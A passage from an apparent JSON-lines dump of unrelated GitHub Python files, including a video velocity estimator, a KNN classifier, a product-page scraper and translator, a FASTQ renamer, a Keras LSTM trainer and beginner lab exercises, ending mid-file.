hnn = np.hstack((hn, np.zeros(N - N2)))\n # Xk = nf.fft(xnn)\n # Hk = nf.fft(hnn)\n # for j in range(N):\n # Yk[j] = Xk[j] * Hk[j]\n # yn = nf.ifft(Yk)\n # yn = np.abs(yn) #卷积运算进行滤波(结束)\n # yn = yn.tolist()\n # yn0 = yn[int(N2 / 2):int(N2 / 2) + N1]\n # yn_mean = np.mean(yn0)\n yn_mean = np.mean(xn)\n velocity = yn_mean / (how_many_frame_will_detect / video_frame_rate)\n sheet[int(frame_idx / how_many_frame_will_detect) - 1][id + 1] = velocity * 3.6\n if (velocity > 40) or (velocity < 0.2): # 判断速度是否可信\n try:\n velocity = np_store[id][1]\n except:\n velocity = 0\n else:\n np_store[id][1] = velocity # 存储可信速度\n elif frame_idx >= (point - 1) * how_many_frame_will_detect + 2: # 视频帧数大于指定值除于point-1来求平均\n sheet[int(frame_idx / how_many_frame_will_detect) - 1][0] = frame_idx / how_many_frame_will_detect\n for j in range(0, 2 * point, 2): # 以2为步长,point为7的时候,loc有7个元素\n loc[:, int(j / 2)] = location(height, width, np_store[id][j + 2], np_store[id][j + 3])\n for k in range(point - 1): # 当point为7,distance_point有6个元素\n distance_point[k] = math.sqrt(sum(np.square(loc[:, k + 1] - loc[:, k])))\n velocity_point[k] = distance_point[k] / (how_many_frame_will_detect / video_frame_rate)\n xn = velocity_point\n # N1 = len(xn)\n # N2 = len(hn)\n # N = N1 + N2\n # Yk = np.zeros(N)\n # Yk = nf.fft(Yk)\n # xnn = np.hstack((xn, np.zeros(N - N1)))\n # hnn = np.hstack((hn, np.zeros(N - N2)))\n # Xk = nf.fft(xnn)\n # Hk = nf.fft(hnn)\n # for j in range(N):\n # Yk[j] = Xk[j] * Hk[j]\n # yn = nf.ifft(Yk)\n # yn = np.abs(yn)\n # yn = yn.tolist()\n # yn0 = yn[int(N2/2):int(N2/2)+N1]\n # yn0 = sorted(yn0)\n # yn0.remove(yn0[0])\n # yn0.remove(yn0[-1])\n xn = xn.tolist()\n xn = sorted(xn)\n xn.remove(xn[0])\n xn.remove(xn[-1])\n yn_mean = np.mean(xn)\n velocity = yn_mean / (how_many_frame_will_detect / video_frame_rate)\n sheet[int(frame_idx / how_many_frame_will_detect) - 1][id + 1] = velocity * 3.6\n if (velocity > 40) or (velocity < 0.2): # 判断速度是否可信\n try:\n velocity = np_store[id][1]\n except:\n velocity = 0\n else:\n np_store[id][1] = velocity\n else:\n velocity = 0\n\n return velocity, np_store, sheet\n","repo_name":"beturer/yolov5_deepsort_fore","sub_path":"velocity_estimate.py","file_name":"velocity_estimate.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71431084648","text":"# https://archive.ics.uci.edu/ml/datasets/pima+indians+diabetes \nimport pandas as pd\nimport numpy as np\nfrom sklearn import model_selection, neighbors\n#to the uci dataset we add the attributes row and then use that in this example.\ndf= pd.read_csv('dataset/prima-indians-diabetes.txt')\n\nx= np.array(df.drop(['Class variable'],1))\ny= np.array(df['Class variable'])\n\nx_train, x_test, y_train, y_test= model_selection.train_test_split(x,y,test_size=0.2)\n\nclf=neighbors.KNeighborsClassifier()\n#IF K NOT MENTIONED , AUTOMATICALLY TAKE K AS 5\nclf.fit(x_train, y_train)\n\naccuracy=clf.score(x_test,y_test)\nprint(accuracy)\n#0.74025974026\n","repo_name":"gagicha/machine_learning","sub_path":"diabetes classification(KNN).py","file_name":"diabetes classification(KNN).py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21259469508","text":"import show_tree as ST\nimport pre_script_semeval\nimport stanford_pos\nimport parse\nimport subprocess\nimport os\nreload(ST)\n\ndef conll_format(a, g, w, parents_list, deprels_list, postags_list, filename):\n '''\n INPUT:\n a :: aspect\n g :: opinion\n w :: corresponding words\n '''\n out = ''\n for aspect, opinion, sw, pa, de, pt in zip(a, g, w, parents_list, deprels_list, postags_list):\n for asp, opi, w, parent, deprel, postag in zip(aspect, opinion, sw, pa, de, pt):\n out += w + ' ' + asp + ' ' + opi + ' ' + parent + ' ' + deprel +' ' + postag + '\\n'\n out += '\\n'\n f = open(filename,'w')\n f.writelines(out)\n f.close()\n\ndef train_test_save(direc, data, Type=''):\n tokens_list = []\n aspects_list = []\n opinions_list = []\n parents_list = []\n deprels_list = []\n postags_list = []\n\n with open(direc + data + '.toks'+Type, 'r') as fin1, open(direc + data + '.label.raw'+Type, 'r') as fin2,\\\n open(direc + data + '.opinion.raw' + Type, 'r') as fin3, open(direc + data + '.parents' + Type, 'r') as fin4,\\\n open(direc + data + '.rels' + Type, 'r') as fin5, open(direc + data + '.pos_tag' + Type, 'r') as fin6:\n for line1 in fin1:\n tokens = line1.strip().split()\n tokens_list.append(tokens)\n for line2 in fin2:\n aspects = line2.strip().split()\n aspects_list.append(aspects)\n for line3 in fin3:\n opinions = line3.strip().split()\n opinions_list.append(opinions)\n for line4 in fin4:\n parents = line4.strip().split()\n parents_list.append(parents)\n for line5 in fin5:\n deprels = line5.strip().split()\n deprels_list.append(deprels)\n for line6 in fin6:\n postags = line6.strip().split()\n postags_list.append(postags)\n\n save_data_dir = direc\n if not os.path.exists(save_data_dir):\n os.mkdir(save_data_dir)\n pred_file_name = save_data_dir+ data + '.conll'+Type\n conll_format(aspects_list, opinions_list, tokens_list, parents_list, deprels_list, postags_list, pred_file_name)\n\nif __name__ == '__main__':\n datasets = ['rest', 'laptop', 'restaurant'] #'laptop', 'restaurant'\n\n for dataset in datasets:\n direc = '../data/' + dataset + '/'\n data = dataset\n\n if not os.path.exists(direc + data + '.toks'+'_train'):\n pre_script_semeval.main(dataset)\n stanford_pos.main(dataset, Type='_train')\n stanford_pos.main(dataset, Type='_test')\n parse.main(dataset, Type='_train')\n parse.main(dataset, Type='_test')\n train_test_save(direc, data, Type='_train')\n train_test_save(direc, data, Type='_test')\n\n\n","repo_name":"wuwenyan2018/Double-propagation","sub_path":"conll_format_opinion_target.py","file_name":"conll_format_opinion_target.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3962067310","text":"from requests_html import HTMLSession\nimport translators as ts\nimport csv\nimport re\nimport time\n\n\n\nurl = 'https://ecoxtrem.com/e-motos'\n\ndatasources =[]\ndatasourcesFormated =[]\nimagesources =[]\nstringa =''\nresultFr =[]\nresultFrN = []\nresultEs =[]\nmy_dict =[]\nCategories = \"E-motos\"\ns = HTMLSession()\nfullTs=''\ndef nth_repl(s, sub, repl, n):\n find = s.find(sub)\n # If find is not -1 we have found at least one match for the substring\n i = find != -1\n # loop util we find the nth or we find no match\n while find != -1 and i != n:\n # find + 1 means we start searching from after the last match\n find = s.find(sub, find + 1)\n i += 1\n # If i is equal to n we found nth match so replace\n if i == n:\n return s[:find] + repl + s[find+len(sub):]\n return s\n\ndef get_links(url):\n r = s.get(url)\n items = r.html.find('div.pro_outer_box.clearfix.home_default')\n links = []\n for item in items:\n links.append(item.find('a', first=True).attrs['href'])\n return links\n\ndef get_product_images(imagelink):\n r = s.get(imagelink)\n mainImages = r.html.find('div.images-container-0 picture img.pro_gallery_item')\n for item in mainImages:\n try:\n imagesources.append(item.attrs['data-src'])\n except IndexError:\n imagesources.append(item.attrs['srcset'])\n return imagesources\n\n \n\n\ndef get_productdata(link):\n r = s.get(link)\n title = r.html.find('h1', first=True).full_text\n title = ts.google(title, from_language = 'es', to_language='fr')\n \n \n try:\n price = r.html.find('div.current-price span')[0].full_text\n except IndexError:\n price = '0'\n try:\n regularprice = r.html.find('div.current-price span')[2].full_text\n except IndexError:\n regularprice = '0'\n \n \n desc = r.html.find('div.st_read_more_box p', first=True).full_text\n desc = ts.google(desc, from_language = 'es', to_language='fr')\n try:\n fulldesc = str(r.html.find('div.st_read_more_box')[1].html)\n except IndexError:\n fulldesc = str(r.html.find('div.st_read_more_box')[0].html)\n \n mainImages = r.html.find('div.images-container-0 picture img.pro_gallery_item')\n attributeNames = r.html.find('div.tab-pane-body section.product-features dt.name')\n attributeValues = r.html.find('div.tab-pane-body section.product-features dd.value')\n # my_dict[attributeNames]=attributeValues\n fulldesc = fulldesc.replace(\"\\n\", \" \").strip()\n fulldesc = fulldesc.replace(\";\", \" \")\n # sku = r.html.find('span.sku', first=True).full_text\n \n datasources =[]\n for item in mainImages:\n try:\n datasources.append(item.attrs['srcset'])\n except:\n datasources.append(item.attrs['data-src'])\n \n\n listToStr = ', '.join([str(elem) for elem in datasources])\n # listToStr = listToStr.replace(\"https://ecoxtrem.com\", \"http://localhost/easywpslider/wp-content/uploads/2021/06\")\n stringa = listToStr.split(\"/\", -1)\n stringa = stringa[4].split(\",\", -1)\n\n stringa = listToStr.replace( \"/\"+stringa[0], \".jpg\")\n stringa = stringa.replace(\"https://ecoxtrem.com\", \"http://localhost/easywpslider/wp-content/uploads/2021/06\")\n \n \n fulldesc = str(fulldesc)\n \n \n \n s1 = fulldesc[:len(fulldesc)//2]\n s2 = fulldesc[len(fulldesc)//2:]\n s1T = ts.google(s1, from_language = 'auto', to_language='fr', if_ignore_limit_of_length=True)\n s2T = ts.google(s2, from_language = 'auto', to_language='fr', if_ignore_limit_of_length=True) \n Category = ts.google(Categories, from_language = 'auto', to_language='fr')\n fullTransDesc = s1T + s2T\n # fullTransDesc = fullTransDesc.replace('src = \"', 'src =\"')\n fullTransDesc = re.sub(r'src = \"', r'src =\"', fullTransDesc)\n\n resultEs = re.findall(r'src=\"(.*?)\"', fulldesc)\n # resultFr = re.findall(r'src =\"(.*?)\"', fullTransDesc)\n resultFr = re.findall(r'src(.*?)https(.*?)\"', fullTransDesc)\n\n # resultTags = re.findall(r'\\s*(<.+?>)\\s*', fullTransDesc)\n # toCorrect = [\"\", \"\", \"\"]\n\n \n for value in resultFr:\n str1 =value\n resultFrN.append(value)\n \n for fr,es in zip(resultFrN, resultEs):\n # Replace key character with value character in string\n fullTs = ''.join(fullTransDesc.replace(fr[1], es))\n \n \n\n \n fullTransDesc = fullTransDesc.replace(\"Div\", \"div\")\n fullTransDesc = fullTransDesc.replace(\"la classe\", \"class\")\n fullTransDesc = fullTransDesc.replace(\"col-MD-6\", \"col-md-6\")\n fullTransDesc = fullTransDesc.replace(\"H2\", \"h2\")\n fullTransDesc = fullTransDesc.replace(\"

\", \"

\")\n fullTransDesc = fullTransDesc.replace(\"\", \"

\")\n fullTransDesc = fullTransDesc.replace(\"\", \"

\")\n fullTransDesc = fullTransDesc.replace(\"\", \"\")\n fullTransDesc = fullTransDesc.replace(\"H3\", \"h3\")\n fullTransDesc = fullTransDesc.replace(\"\", \"\")\n fullTransDesc = fullTransDesc.replace(\"
    \", \"
      \")\n fullTransDesc = fullTransDesc.replace(\"
    • \", \"
    • \")\n fullTransDesc = fullTransDesc.replace(\"
    • \", \"
    • \")\n fullTransDesc = fullTransDesc.replace(\"\", \"
    • \")\n fullTransDesc = fullTransDesc.replace(\"\", \"
    • \")\n fullTransDesc = fullTransDesc.replace(\"\", \"
    • \") \n fullTransDesc = fullTransDesc.replace(\"< / Li>\", \"\")\n fullTransDesc = fullTransDesc.replace(\"
    • \", \"
    • \")\n fullTransDesc = fullTransDesc.replace(\"\", \"
    • \")\n fullTransDesc = fullTransDesc.replace(\"\", \"
    \")\n fullTransDesc = fullTransDesc.replace(\"\", \"\")\n fullTransDesc = fullTransDesc.replace(\"classe\", \"class\")\n fullTransDesc = fullTransDesc.replace(\"
      \", \"
        \")\n fullTransDesc = fullTransDesc.replace(\"mas =\", \"class=\")\n fullTransDesc = fullTransDesc.replace(\"
      • \", \"
      • \")\n fullTransDesc = fullTransDesc.replace(\"< Li>\", \"
      • \") \n fullTransDesc = fullTransDesc.replace(\"< / div>\", \"\")\n fullTransDesc = fullTransDesc.replace(\"\", \"\")\n fullTransDesc = fullTransDesc.replace(\"\", \"\")\n fullTransDesc = fullTransDesc.replace(\"< / p>\", \"

        \")\n\n\n # print(fullTransDesc)\n # print(fulldesc)\n \n\n # product = {}\n product = {'ID':'',\n 'Type':'simple',\n 'SKU':'',\n 'Name':title.strip(),\n 'Published':1,\n '\"Is featured?\"':0,\n '\"Visibility in catalog\"':'visible',\n '\"Short description\"':desc.strip(),\n 'Description':fullTransDesc,\n '\"Date sale price starts\"':'',\n '\"Date sale price ends\"':'',\n '\"Tax status\"':'taxable',\n '\"Tax class\"':'',\n '\"In stock?\"':1,\n 'Stock':'',\n '\"Low stock amount\"':'',\n '\"Backorders allowed?\"':0,\n '\"Sold individually?\"':0,\n '\"Weight (kg)\"':'',\n '\"Length (cm)\"':'',\n '\"Width (cm)\"':'',\n '\"Height (cm)\"':'',\n '\"Allow customer reviews?\"':1,\n '\"Purchase note\"':'',\n '\"Sale price\"':price.replace('€', '').strip(),\n '\"Regular price\"':regularprice.replace('€', '').strip(),\n 'Categories':Category,\n 'Tags':'',\n '\"Shipping class\"':'',\n 'Images':stringa,\n '\"Download limit\"':'',\n '\"Download expiry days\"':'',\n 'Parent':'',\n '\"Grouped products\"':'',\n 'Upsells':'',\n 'Cross-sells':'',\n '\"External URL\"':'',\n '\"Button text\"':'',\n 'Position':0,\n 'Attribute 1 name':'',\n 'Attribute 1 value(s)':'',\n 'Attribute 1 visible':'',\n 'Attribute 1 global':'',\n \n 'Attribute 2 name':'',\n 'Attribute 2 value(s)':'',\n 'Attribute 2 visible':'',\n 'Attribute 2 global':'',\n \n 'Attribute 3 name':'',\n 'Attribute 3 value(s)':'',\n 'Attribute 3 visible':'',\n 'Attribute 3 global':'',\n \n 'Attribute 4 name':'',\n 'Attribute 4 value(s)':'',\n 'Attribute 4 visible':'',\n 'Attribute 4 global':'',\n \n 'Attribute 5 name':'',\n 'Attribute 5 value(s)':'',\n 'Attribute 5 visible':'',\n 'Attribute 5 global':'',\n \n 'Attribute 6 name':'',\n 'Attribute 6 value(s)':'',\n 'Attribute 6 visible':'',\n 'Attribute 6 global':'',\n \n 'Attribute 7 name':'',\n 'Attribute 7 value(s)':'',\n 'Attribute 7 visible':'',\n 'Attribute 7 global':'',\n\n 'Attribute 8 name':'',\n 'Attribute 8 value(s)':'',\n 'Attribute 8 visible':'',\n 'Attribute 8 global':'',\n \n 'Attribute 9 name':'',\n 'Attribute 9 value(s)':'',\n 'Attribute 9 visible':'',\n 'Attribute 9 global':'',\n \n 'Attribute 10 name':'',\n 'Attribute 10 value(s)':'',\n 'Attribute 10 visible':'',\n 'Attribute 10 global':'',\n \n 'Attribute 11 name':'',\n 'Attribute 11 value(s)':'',\n 'Attribute 11 visible':'',\n 'Attribute 11 global':'',\n \n 'Attribute 12 name':'',\n 'Attribute 12 value(s)':'',\n 'Attribute 12 visible':'',\n 'Attribute 12 global':'',\n \n 'Attribute 13 name':'',\n 'Attribute 13 value(s)':'',\n 'Attribute 13 visible':'',\n 'Attribute 13 global':'',\n \n 'Attribute 14 name':'',\n 'Attribute 14 value(s)':'',\n 'Attribute 14 visible':'',\n 'Attribute 14 global':'',\n \n 'Attribute 15 name':'',\n 'Attribute 15 value(s)':'',\n 'Attribute 15 visible':'',\n 'Attribute 15 global':'',\n \n 'Attribute 16 name':'',\n 'Attribute 16 value(s)':'',\n 'Attribute 16 visible':'',\n 'Attribute 16 global':'',\n \n 'Attribute 17 name':'',\n 'Attribute 17 value(s)':'',\n 'Attribute 17 visible':'',\n 'Attribute 17 global':'',\n \n }\n \n \n \n # for cle,val in zip(attributeNames, attributeValues): \n for i in range(len(attributeNames)): \n nameCell = 'Attribute '+str(i+1)+' name'\n valueCell = 'Attribute '+str(i+1)+' value(s)'\n visibleCell ='Attribute '+str(i+1)+' visible'\n publicCell = 'Attribute '+str(i+1)+' global'\n\n value = attributeNames[i]\n value = str(value.full_text)\n value = ts.google(value, from_language = 'es', to_language='fr')\n\n cellValue = attributeValues[i]\n cellValue =str(cellValue.full_text)\n cellValue = ts.google(cellValue, from_language = 'es', to_language='fr')\n\n product[nameCell]= value\n product[valueCell]= cellValue\n product[visibleCell]= ''\n product[publicCell]= ''\n \n # # print(descLinked)\n\n # # print(fulldesc.replace(\"\\r\", \" \"))\n print(product.keys())\n return product\n \n \nresults = []\nlinks = get_links(url)\n\nfor link in links:\n results.append(get_productdata(link))\n time.sleep(1)\n\n\n# with open('emoto.csv', 'w', encoding='utf8', newline='') as f:\n# fc = csv.DictWriter(f, fieldnames=results[0].keys(),)\n# fc.writeheader()\n# fc.writerows(results)\n\nfor item in links:\n imagelink = get_product_images(item)\n for image in imagelink:\n r = s.get(image)\n name = image.split(\"/\")[3]\n with open(\"images/\"+name+\".jpg\", \"wb\") as fp:\n fp.write(r.content)\n \n\n","repo_name":"Alucard17th/woo-parser","sub_path":"wooparsee-motos.py","file_name":"wooparsee-motos.py","file_ext":"py","file_size_in_byte":10845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27374393642","text":"import logging\nimport os\nimport shutil\n\nimport pkg_resources\n\n\ndef copy_project_folder(directory):\n \"\"\"Creates folder structure in the target directory\n\n Parameters\n ----------\n directory:\n Location where the sample project should be copied to\n \"\"\"\n _recursive_overwrite(\"smif\", \"sample_project\", directory)\n if directory == \".\":\n dirname = \"the current directory\"\n else:\n dirname = directory\n logging.info(\"Created sample project in %s\", dirname)\n\n\ndef _recursive_overwrite(pkg, src, dest):\n if pkg_resources.resource_isdir(pkg, src):\n if not os.path.isdir(dest):\n os.makedirs(dest)\n contents = pkg_resources.resource_listdir(pkg, src)\n for item in contents:\n _recursive_overwrite(pkg, os.path.join(src, item), os.path.join(dest, item))\n else:\n filename = pkg_resources.resource_filename(pkg, src)\n shutil.copyfile(filename, dest)\n","repo_name":"nismod/smif","sub_path":"src/smif/controller/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"10345362098","text":"from django.urls import path\nfrom userprofile import views\n\n#TEMPLATE TAGGING\napp_name = 'userprofile'\n\nurlpatterns = [\n # path('submit/', views.submit, name='submit'),\n # path('newest/', views.newest, name='newest'),\n # path('s//vote/', views.vote, name='vote'),\n # path('s//', views.story, name='story'),\n path('/', views.userprofile, name='userprofile'),\n path('/votes/', views.votes, name='votes'),\n path('/submissions/', views.submissions, name='submissions'),\n\n]\n","repo_name":"shubhavee/Tech-News","sub_path":"technews/userprofile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34796821812","text":"# To make get similar random data splits etc:\n# https://keras.io/getting-started/faq/#how-can-i-record-the-training-validation-loss-accuracy-at-each-epoch\nRANDOM_SEED = 1\n\nimport numpy as np\nnp.random.seed(RANDOM_SEED)\nimport os\nos.environ['PYTHONHASHSEED'] = str(RANDOM_SEED)\nimport random as rn\nrn.seed(RANDOM_SEED)\n\nimport random\n\nfrom keras import backend as K\n\nimport tensorflow as tf\ntf.set_random_seed(RANDOM_SEED)\n\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, CSVLogger\nfrom keras.models import Sequential, load_model\nfrom keras.optimizers import Adam\nfrom keras.layers import LSTM, Dense, Dropout, Activation\nfrom keras.layers.core import Masking\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.normalization import BatchNormalization\n\nimport encoding\nimport data_generator\n\n\ndef build_model(\n input_length, char_count, depth, hidden_size, output_size, dropout=0.5\n):\n input_shape = (input_length, char_count)\n\n model = Sequential()\n\n model.add(Masking(input_shape=input_shape))\n\n for i in range(depth):\n layer_kwargs = {}\n layer_kwargs['return_sequences'] = i < (depth - 1)\n if input_shape and i == 0:\n layer_kwargs['input_shape'] = input_shape\n\n model.add(LSTM(\n hidden_size,\n **layer_kwargs\n ))\n model.add(BatchNormalization())\n model.add(Dropout(dropout))\n\n model.add(Dense(output_size))\n model.add(Activation('tanh'))\n\n model.compile(\n optimizer=Adam(clipnorm=5.),\n loss='mse',\n )\n\n return model\n\n\ndef train_from_generator(\n model,\n training_generator, training_steps_per_epoch,\n x_test, y_test,\n epochs, batch_size,\n **kwargs\n):\n history = None\n\n try:\n history = model.fit_generator(\n training_generator,\n steps_per_epoch=training_steps_per_epoch,\n max_queue_size=(2 * batch_size),\n epochs=epochs,\n verbose=2,\n validation_data=(x_test, y_test),\n callbacks=[\n EarlyStopping(\n patience=100,\n monitor='loss',\n ),\n ModelCheckpoint(\n 'model.h5',\n monitor='loss',\n save_best_only=True,\n ),\n CSVLogger('log.csv'),\n ],\n **kwargs\n )\n except KeyboardInterrupt:\n print(' Got Sigint')\n\n return history\n\n\ndef test_model(model, ranks, inverse_ranks, w2v_model, count, scaler=None):\n max_word_length = model.input_shape[1]\n x_test, y_test = data_generator.build_word2vec_data(\n w2v_model, ranks, max_word_length, scaler=scaler, count=count\n )\n\n n_test_data = len(x_test)\n count = min(count, n_test_data)\n indexes = random.sample(range(n_test_data), count)\n\n test_rows = x_test[indexes]\n predictions = model.predict(test_rows)\n targets = y_test[indexes]\n\n for i in range(count):\n print('{}: {} -> {:.8f}'.format(\n i,\n encoding.features_to_text(test_rows[i], inverse_ranks),\n np.linalg.norm(targets[i] - predictions[i]),\n ))\n\n\ndef main():\n max_word_length = 32\n batch_size = 64\n depth = 2\n hidden_size = 300\n\n training_steps_per_epoch = round(9000 / 64)\n epochs = 100\n\n w2v_model = data_generator.load_w2v_model('10k.npz')\n train_w2v_model, test_w2v_model = data_generator.split_w2v_model(w2v_model)\n\n ranks, inverse_ranks = encoding.load_ranks_from_file('ranks.pickle')\n\n scaler = data_generator.fit_scaler_on_w2v_data(train_w2v_model)\n\n generator = data_generator.word2vec_data_generator(\n train_w2v_model, ranks, max_word_length, batch_size, scaler=scaler\n )\n x_test, y_test = data_generator.build_word2vec_data(\n test_w2v_model, ranks, max_word_length, scaler=scaler\n )\n\n model = build_model(max_word_length, len(ranks), depth, hidden_size, 300)\n\n print()\n model.summary()\n print()\n\n print()\n test_model(model, ranks, inverse_ranks, test_w2v_model, 10, scaler=scaler)\n print()\n\n train_from_generator(\n model,\n generator, training_steps_per_epoch,\n x_test, y_test,\n epochs, batch_size,\n )\n\n print()\n test_model(model, ranks, inverse_ranks, test_w2v_model, 10, scaler=scaler)\n print()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"cpury/deep-embedding-pretraining","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70357440489","text":"#Task_9\n\n#Написать программу, которая преобразует имя переменной в формате snake_case в формат CamelCase. Для простоты считаем,\n# что имя переменной всегда состоит из 3-х слов. Например: 'employee_first_name' -> 'EmployeeFirstName'\n\n\nsnake_style = 'employee_first_name'\nvar_str = snake_style.split('_')\nCamelCase = var_str[0].title() + var_str[1].title() + var_str[2].title()\nprint('CamelCase for %s is %s' %(snake_style, CamelCase))","repo_name":"exxmanster/introduction_python_hw","sub_path":"task_9.py","file_name":"task_9.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38793825627","text":"from __future__ import print_function\nfrom __future__ import division\nimport sys\nimport math\nimport os\nimport numpy\n\n# ***** readme *****\n# 这个代码将所有的fastq文件重命名为数字系列,并且保存映射表\n# 也可以反过来操作\n\n\nfolder = sys.argv[1]\n\nmapfilepath = ''\n\nif len(sys.argv) > 2:\n mapfilepath = sys.argv[2]\n\nmapdict = {}\nif mapfilepath == '':\n if os.path.exists(folder + '/RenameList.txt'):\n print('The input files may have already renamed, since RenameList.txt is detected in ' + folder + '. To force rename files, please remove RenameList.txt')\n exit(1)\n count = 0\n for filename in os.listdir(folder):\n if filename.endswith('_1.fastq'):\n count += 1\n os.rename(folder + '/' + filename, folder + '/' + str(count) + '_1.fastq')\n mapdict[count] = filename[:-8]\n try:\n os.rename(folder + '/' + filename[:-7] + '2.fastq', folder + '/' + str(count) + '_2.fastq')\n except Exception as e:\n sys.stderr.write(str(e) + ' Rename the pair: ' + filename[:-7] + '_2.fastq failed.\\n')\n if filename.endswith('_1.fastq.gz'):\n count += 1\n os.rename(folder + '/' + filename, folder + '/' + str(count) + '_1.fastq.gz')\n mapdict[count] = filename[:-11]\n try:\n os.rename(folder + '/' + filename[:-10] + '2.fastq.gz', folder + '/' + str(count) + '_2.fastq.gz')\n except Exception as e:\n sys.stderr.write(str(e) + ' Rename the pair: ' + filename[:-10] + '_2.fastq.gz failed.\\n')\n outfile = open(folder + '/RenameList.txt', 'w')\n for key in mapdict:\n outfile.write(str(key) + '\\t' + mapdict[key] + '\\n')\n outfile.close()\nelse:\n if not os.path.exists(folder + '/RenameList.txt'):\n print('RenameList.txt cannot be found in ' + folder + ', please check it')\n exit(1)\n mapfile = open(mapfilepath)\n for line in mapfile.readlines():\n info = line.rstrip().split('\\t')\n mapdict[int(info[0])] = info[1]\n for key in mapdict:\n if os.path.exists(folder + '/' + str(key) + '_1.fastq'):\n os.rename(folder + '/' + str(key) + '_1.fastq', folder + '/' + str(mapdict[key]) + '_1.fastq')\n if os.path.exists(folder + '/' + str(key) + '_2.fastq'):\n os.rename(folder + '/' + str(key) + '_2.fastq', folder + '/' + str(mapdict[key]) + '_2.fastq')\n if os.path.exists(folder + '/' + str(key) + '_1.fastq.gz'):\n os.rename(folder + '/' + str(key) + '_1.fastq.gz', folder + '/' + str(mapdict[key]) + '_1.fastq.gz')\n if os.path.exists(folder + '/' + str(key) + '_2.fastq.gz'):\n os.rename(folder + '/' + str(key) + '_2.fastq.gz', folder + '/' + str(mapdict[key]) + '_2.fastq.gz')","repo_name":"ZijieJin/scFusion","sub_path":"bin/RenameFastqFiles.py","file_name":"RenameFastqFiles.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"34813093622","text":"# Name: Chandler Wilson\n# Date: 07/05/2018\n# COSC1336, Lab 6, 4 parts:\n# part 1: Write prime numbers to table\n# part 2: Census stat generator\n# part 3: Sum of file\n# part 4: Accept textual numbers for file sum\n\n\n# TODO This would make far more sense as a class (esp in terms of testability)\ndef how_many_primes():\n\n def prime_test(number):\n \"\"\"Tests a number to see if it is prime returns True if it is\"\"\"\n is_prime = True\n # Create an odd number list\n list_to_test = [2] + list(range(3, (number - 1), 2))\n\n # Concatenate 2 to check if even\n for i in list_to_test:\n if (number % i) == 0:\n is_prime = False\n break\n\n return is_prime\n\n def primes_to_nth_prime(n):\n \"\"\"Find the primes up to the nth prime and return them as a list.\"\"\"\n range_to_test = range(1, 1000000000, 2)\n prime_list = []\n\n # TODO I should really cache the results just brute forcing rn\n for odd_number in range_to_test:\n if len(prime_list) >= n:\n break\n if prime_test(odd_number):\n prime_list.append(odd_number)\n\n return prime_list\n\n def prime_table(number_of_primes):\n \"\"\"Generate a prime table\n\n Outputs to TT18_L6_Wilson_number_of_primesPrimes.txt.\n\n Args:\n number_of_primes (int): The number of primes to put into the table.\n \"\"\"\n\n def table_heading(number_of_primes, last_prime, outfile):\n number_of_primes = format(number_of_primes, ',')\n last_prime = format(last_prime, ',')\n # Centers within given number of characters\n # see https://pyformat.info/#string_pad_align\n first_line = format(\n 'The First ' + number_of_primes + ' Primes\\n', '^79')\n\n outfile.write(first_line)\n outfile.write('(the ' + number_of_primes +\n 'th is ' + last_prime + ')\\n')\n outfile.write('\\n')\n\n def table_footer(outfile):\n centered_end = format('End.', '^79')\n\n outfile.write('\\n')\n outfile.write(centered_end)\n\n primes_list = primes_to_nth_prime(number_of_primes)\n file_name = 'TT18_L6_Wilson_' + str(number_of_primes) + 'Primes.txt'\n outfile = open(file_name, 'w')\n counter = 1\n\n table_heading(number_of_primes, primes_list[-1], outfile)\n\n for prime in primes_list:\n if counter % 10 is 0 and counter is not 0:\n # This format forces seven digits of padding\n # see https://pyformat.info/#number\n outfile.write(format(prime, '7d') + '\\n')\n else:\n outfile.write(format(prime, '7d') + ', ')\n\n counter += 1\n\n table_footer(outfile)\n\n outfile.close()\n\n def collect_number():\n try:\n number = input('How many primes would you like in the table? ' +\n '(enter for 1000): ')\n\n if not number:\n number = 1000\n else:\n number = int(number)\n\n # Check the range of the number\n if 1 < number < 1000000:\n pass\n else:\n raise ValueError\n except ValueError:\n print('ERROR: Please enter an integer between 1 and 1,000,000')\n print('-' * 30)\n return collect_number()\n else:\n return number\n\n number_of_primes = collect_number()\n prime_table(number_of_primes)\n\n\nclass Census():\n\n def __init__(self, infile_name):\n self.infile_name = infile_name\n self.state_info = {}\n\n self.encode_file()\n self.population_stats()\n\n def encode_file(self):\n infile = open(self.infile_name)\n\n with open(self.infile_name) as infile:\n while True:\n state = infile.readline().strip('\\n')\n\n if state:\n abbreviation = infile.readline().strip('\\n')\n population = infile.readline().strip('\\n')\n\n self.state_info[state] = {\n 'abbreviation': abbreviation,\n 'population': int(population)\n }\n else:\n break\n\n return self.state_info\n\n def population_stats(self):\n # This sorts by population retrieving the population with the lambda\n sorted_states_list = sorted(\n self.state_info,\n key=lambda state: self.state_info[state]['population'])\n total_population = 0\n\n for state in self.state_info:\n total_population += self.state_info[state]['population']\n\n highest_population = sorted_states_list[-1]\n lowest_population = sorted_states_list[1]\n average_population = format(\n (total_population / len(self.state_info)), ',.0f')\n texas_population = format(\n self.state_info['Texas']['population'], ',.0f')\n\n print(highest_population, 'has the highest population')\n print(lowest_population, 'has the lowest population')\n print(\"The average state's population is\", average_population)\n print('The state of 